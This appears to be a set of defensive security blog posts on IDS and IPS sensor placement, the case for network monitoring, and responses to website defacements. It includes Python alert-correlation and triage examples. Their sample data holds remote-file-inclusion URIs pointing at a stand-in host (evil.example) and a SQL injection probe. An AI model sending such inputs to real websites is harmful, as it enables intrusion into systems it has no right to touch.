One of my colleagues from the technical support department asked me about the best placement of the internal sensor (IDS) when a network also has an IPS in place. So I gave him a simple diagram showing the usual placement of the internal sensor when an IPS is implemented as well.

The reasons why I would place my internal sensor (in this case the DMZ sensor) behind the IPS are:

a) I have always believed that every preventive measure will be defeated sooner or later. If the DMZ sensor sits in front of the IPS, what indication do we have when an attack bypasses the IPS?

b) If the sensor sits in front of the IPS, how do we know whether a particular attack was blocked by the IPS or not?

With this kind of placement, good correlation between the alerts from the external IDS and the internal IDS helps the analyst determine whether an attack bypassed the preventive measures, namely the firewalls and the IPS. To improve identification, both alerts are then compared against the logs retrieved from the targeted server.

As an example, say the external sensor produces an alert for a remote file inclusion attempt against the web server. If the internal sensor produces the same alert, the attempt has successfully bypassed the firewall (of course) and the IPS as well. Only then is the alert sent to the analyst console; if only the external sensor produces the alert, it can be discarded or withheld from the analyst console. It may be kept for statistical purposes, perhaps.

A further step: if the external and internal sensors produce the same alert, it is compared against the web log obtained from the targeted web server. If the response code for that request is 200, the alerts go to the analyst console; otherwise they are discarded.
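The correlation described in the last three paragraphs, written out as an added example (not code from the original post). It uses constructed alerts from two hypothetical sensors and a constructed Apache log from the targeted server; the field names, the 60-second match window and the alert format are assumptions for illustration. An external-only alert is counted for statistics, an alert seen by both sensors is escalated to the console only when the server answered 200, and otherwise discarded.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    sensor: str   # "external" (in front of firewall/IPS) or "internal" (DMZ sensor behind IPS)
    ts: int       # alert time, epoch seconds
    src: str      # attacker address
    dst: str      # targeted server
    sig: str      # signature name fired by the sensor
    uri: str      # request URI carried in the alert


# Constructed alerts from two hypothetical sensors watching the same web server.
ALERTS = [
    Alert("external", 1000, "203.0.113.5",  "192.0.2.10", "WEB RFI attempt",  "/index.php?page=http://evil.example/s.txt"),
    Alert("internal", 1001, "203.0.113.5",  "192.0.2.10", "WEB RFI attempt",  "/index.php?page=http://evil.example/s.txt"),
    Alert("external", 1100, "198.51.100.7", "192.0.2.10", "WEB RFI attempt",  "/index.php?page=http://evil.example/c.txt"),
    Alert("external", 1200, "198.51.100.9", "192.0.2.10", "WEB SQLi attempt", "/login.php?id=1'"),
    Alert("internal", 1201, "198.51.100.9", "192.0.2.10", "WEB SQLi attempt", "/login.php?id=1'"),
]

# Constructed Apache combined-format lines retrieved from the targeted server.
WEB_LOG = """\
203.0.113.5 - - [10/Oct/2008:13:55:36 +0800] "GET /index.php?page=http://evil.example/s.txt HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
198.51.100.9 - - [10/Oct/2008:13:58:41 +0800] "GET /login.php?id=1' HTTP/1.1" 500 312 "-" "Mozilla/4.0"
"""

# client, ident, user, [timestamp], "METHOD URI PROTO", status
LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})')


def parse_web_log(text):
    """Map (client_ip, uri) -> HTTP status code for each request in the log."""
    status = {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            status[(m["src"], m["uri"])] = int(m["status"])
    return status


def correlate(alerts, web_log_text, window=60):
    """Sort alerts into the three buckets described in the post.

    stats:     fired on the external sensor only, so the firewall/IPS stopped it
    console:   fired on both sensors and the server answered 200
    discarded: fired on both sensors but the server did not answer 200
    """
    status = parse_web_log(web_log_text)
    internal = [a for a in alerts if a.sensor == "internal"]
    result = {"console": [], "discarded": [], "stats": []}
    for ext in (a for a in alerts if a.sensor == "external"):
        key = (ext.src, ext.dst, ext.sig, ext.uri)
        # same attacker, target, signature and URI, seen inside shortly after outside
        match = next((i for i in internal
                      if (i.src, i.dst, i.sig, i.uri) == key and 0 <= i.ts - ext.ts <= window), None)
        if match is None:
            result["stats"].append(ext)
        elif status.get((ext.src, ext.uri)) == 200:
            result["console"].append(match)
        else:
            result["discarded"].append(match)
    return result


if __name__ == "__main__":
    for bucket, items in correlate(ALERTS, WEB_LOG).items():
        for a in items:
            print(f"{bucket:9s} {a.src:14s} {a.sig}")
```

With the constructed data, the RFI from 203.0.113.5 reaches the console, the RFI from 198.51.100.7 was only seen outside and becomes a statistic, and the SQLi from 198.51.100.9 got through but drew a 500, so it is discarded. Matching on the URI as well as the signature keeps two unrelated hits of a noisy signature from being paired.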

BUT then my colleague said:

“That’s what I’ve explained to them, but their question is: why does the internal sensor generate so few alerts compared to the external sensor?”

I told him, “That means their IPS has done a good job la!”

“Yeah, that’s what I thought, and I told them that, but they keep asking the same question.”

I’m out of words…

Is monitoring still relevant if they are going to implement an IPS?

That’s one of the questions posed by my big Boss that really caught my attention (as usual, my Big Boss always gives a series of good topics for our discussion, which I really appreciate. It gets my brain working, and I do feel that I gain something valuable from these discussions, even though they happen via email).

 

So this is my reply:

Interesting question though. Of course, as one of the believers that Prevention Eventually Fails, I believe that the existence of an IPS should never reduce the importance of detection. (Anyway, before it can prevent, it has to detect first ;)

Bejtlich says that Prevention Eventually Fails because of the characteristics of intruders: they are unpredictable, and some of them are smarter than the defenders.
Marcus Ranum says that security is when people stop doing something stupid, and from his piece: “tell me what is so “deep” about knowing how to block 31 attacks?” Even though that article is more about DPI capabilities in firewalls, IMHO it applies equally to perimeter security devices that incorporate an IPS function.

And this is my thought:

Security is a process of reducing risk to an acceptable level. The risk is reduced by carrying out the security process: assessment, protection, detection and response. Not long ago organizations used to say their network was secure once they had firewalls installed; then, when people realized that firewalls only deal with layers 2, 3 and 4, IDS was introduced as an early-warning detection system. Some smart guys thought “if we can detect, why not prevent the attacks as well?”, hence IPS was introduced to the market. IPS is more like giving those perimeter security devices a view of what is happening above layer 5. And of course, IPS, like its predecessor IDS, relies for most of its detection/prevention mechanism on signature-based rules for known attacks. Whether the signature captures the exploit or the vulnerability is another issue.

Depending totally on these perimeter security devices (IPS/firewalls/proxy etc.) is not a wise idea. Why? How can you prevent attacks from unpredictable and smarter attackers? How do you prevent attacks that target unpublished attack vectors and vulnerabilities?

OK, I can hear some of you arguing that in the case of 0-dayz attacks, even an IDS will fail to produce alerts. Now let’s discuss a lil bit about detection.

The detection process consists of collection, identification, validation and escalation. Let me focus on collection. There are reasons why having alert data, session data, statistical data and full content data is the ideal way of collecting network-based information to assist the analyst in identification. We must also be aware that collecting everything is ideal but problematic, BUT to quote from TaoSecurity:

“The advantage of collecting as much data as possible is the creation of options. Collecting full content data gives the ultimate set of options, like replaying traffic through an enhanced IDS signature set to discover previously overlooked incidents. Rich data collections provide material for testing people, policies, and products. Network-based data may provide the evidence to put a criminal behind bars.”

and

“NSM’s answer to the data collection issue is to not rely on a single tool to detect and escalate intrusions. While a protocol analyzer like Ethereal is well suited to interpret a dozen individual packets, it’s not the best tool to understand millions of packets. Turning to session data or statistics on the sorts of ports and addresses is a better way to identify suspicious activity.”

Let’s imagine three scenarios.

Without IDS
An attacker attacks using 0-dayz exploits against 0-dayz vulnerabilities on a workstation. He bypasses the firewalls, the attack patterns don’t match any rules in the IPS, so there is no blocking action. The victim complains, and all we can do is patch and proceed. We never know what actually happened.

With IDS but without a proper collection process
An attacker attacks using 0-dayz exploits against 0-dayz vulnerabilities on a workstation. He bypasses the firewalls, the attack patterns don’t match any rules in the IPS, so there is no blocking action, and the attack patterns don’t match any rules in the IDS, so no alerts are triggered. The victim complains, and all we can do is patch and proceed. We never know what actually happened.

With IDS and a proper collection process
An attacker attacks using 0-dayz exploits against 0-dayz vulnerabilities on a workstation. He bypasses the firewalls, the attack patterns don’t match any rules in the IPS, so there is no blocking action, and the attack patterns don’t match any rules in the IDS, so no alerts are triggered. The victim complains, and we can start investigating with the available data. We update the signatures, perhaps feed them to the IPS and IDS, and the information gathered can be used for legal purposes.

The detection engine is perhaps the main component of an IDS. Its alerts are the main indicators of suspicious events that have occurred (compromise), are ongoing (exploitation), or are about to happen (vulnerability scanning), depending on the phase of compromise. For an analyst to perform identification (categorizing the suspicious event as normal or malicious) he needs all available resources and information to support his analysis. The main problem with IDS is the rate of false positives. The only way to reduce it is by fine-tuning our rules to suit the client environment, and of course we need the client’s inventory lists covering the assets we monitor. It is easier to defend or monitor something that you know and are aware of.
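One concrete use of the inventory list mentioned above, as an added example that is not from the original post: alerts whose signature can only affect a platform the target does not run are suppressed, alerts for hosts missing from the inventory are set aside for the inventory owner, and everything else is kept. The inventory, the signature-prefix-to-service mapping and the alerts are constructed for illustration; the prefixes follow the "WEB-IIS"/"WEB-PHP" naming convention used by Snort rule classes, but the mapping itself is an assumption.

```python
# Constructed inventory for the monitored client: address -> platform facts.
INVENTORY = {
    "192.0.2.10": {"os": "linux",   "services": {"apache", "php"}},
    "192.0.2.11": {"os": "windows", "services": {"iis", "asp"}},
}

# Constructed mapping from a signature's class prefix to the service it can actually hit.
# An empty set means the signature is platform-independent and is never suppressed.
SIG_TARGETS = {
    "WEB-IIS":  {"iis"},
    "WEB-PHP":  {"php"},
    "WEB-MISC": set(),
}

# Constructed alerts as (signature name, destination address).
ALERTS = [
    ("WEB-IIS cmd.exe access",       "192.0.2.10"),  # IIS attack against an Apache box
    ("WEB-PHP remote file include",  "192.0.2.10"),  # PHP attack against a PHP box
    ("WEB-IIS cmd.exe access",       "192.0.2.11"),  # IIS attack against the IIS box
    ("WEB-MISC directory traversal", "192.0.2.11"),  # platform-independent, always kept
    ("WEB-PHP remote file include",  "192.0.2.99"),  # host missing from the inventory
]


def classify(alert, inventory, sig_targets=SIG_TARGETS):
    """Return 'kept', 'suppressed' or 'unknown-asset' for one alert."""
    sig, dst = alert
    host = inventory.get(dst)
    if host is None:
        # Cannot tune what we do not know about; the inventory, not the rule, needs fixing.
        return "unknown-asset"
    needed = sig_targets.get(sig.split(" ", 1)[0], set())
    if needed and not (needed & host["services"]):
        # The signature targets a service this host does not run.
        return "suppressed"
    return "kept"


def triage(alerts, inventory):
    """Bucket a batch of alerts by the inventory check."""
    buckets = {"kept": [], "suppressed": [], "unknown-asset": []}
    for alert in alerts:
        buckets[classify(alert, inventory)].append(alert)
    return buckets


if __name__ == "__main__":
    for bucket, items in triage(ALERTS, INVENTORY).items():
        print(f"{bucket:14s} {len(items)}")
        for sig, dst in items:
            print(f"    {dst:12s} {sig}")
```

Suppressed alerts should still be counted, since a run of IIS signatures against an Apache host is itself a sign of a scanner, and the unknown-asset bucket is the feedback loop that keeps the inventory honest.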

I never said that we should abandon IPS or any other preventive measure. As I stated before, security is about reducing the risk of being compromised, so we have to incorporate every security measure that may deter potential intruders or attackers from launching or continuing their attacks. I don’t believe in depending on one security product or one security measure; anyone who believes his network is secure because such and such products are implemented in it is managing his security based on belief and not on facts, which in the end will fail spectacularly.

And of course: why does a building with biometric access doors, access cards and security guards still need CCTV?

Quite long, eh? Anyway, I would be grateful if any of you guys have other opinions on this matter.

p/s: I’ve censored any sensitive/confidential statements tho ;)

One of my favourite sites nowadays is http://security.org.my, which recently published a series of defacements of .gov-related sites reported by users. Surprisingly, a few websites have been re-defaced from time to time, and sadly the response from the affected parties is either minimal or non-existent.

One commenter on the defacement posting said:

“I think the country can still survive even if Majlis Daerah Kinta Barat or Majlis Perbandaran Manjung gets defaced”

I agree with the statement. Yes, the country will survive this kind of attack on our government-related sites, but let me point out a few things tho.

For me, defacement is an attack that leaves a trace like a blinking neon light in the middle of the desert at night, because we can determine the attacker’s final intention in executing his attack. It is easier to trace, as most of these attacks exploit web application flaws and vulnerabilities, which most of the time are logged either in the web logs or by the IDS. And of course, you obviously know that the defaced website has been compromised. Ahh, and most of the time the attacker is a script kiddie who stumbled upon a few scripts, or a beginner at web attacks; much like when you use nikto/nessus to launch a web vulnerability scan, it DOES produce a huge number of alerts, for snort at least.

But again, I wonder why the response is either too slow or non-existent, and in the case of re-defacement, has the administrator taken any action to prevent the incident from recurring? Most of the time the action is the restoration of the web page(s). But do they identify why the defacement occurred on their sites? Did they perform their own assessment of their assets, applications and platform? Did they perform their patch management accordingly? I guess there are many questions they need to answer.

My concern is not the defacement itself but the response. If they fail to react or respond appropriately to these annoying (in my view) attacks, then let me give one scenario that should put enuff ph34r in those administrators’ hearts.

Imagine an attacker who has the knowledge, the skills, the tools and the motivation to launch his attack while adhering to the maxim of intrusion: “minimize signal, maximize access and maximize damage”. His exploits are custom-made tools, built after he identified an unpublished vulnerability in the victim’s web application (0-dayz). His attack traffic is well crafted to look like normal traffic on the network, and of course such 0-dayz attacks bypass the firewalls and the IPS and even avoid triggering IDS alerts. Or worse, he creates an encrypted channel to communicate with the compromised machine over apparently normal ports. His final intention? To steal data.

If our .gov-related administrators fail to respond appropriately to web defacement attacks, just imagine what kind of response they will give to the attack I’ve described above. I bet the response is none ;)

Am I concerned? No, I am not concerned... I am freaking worried.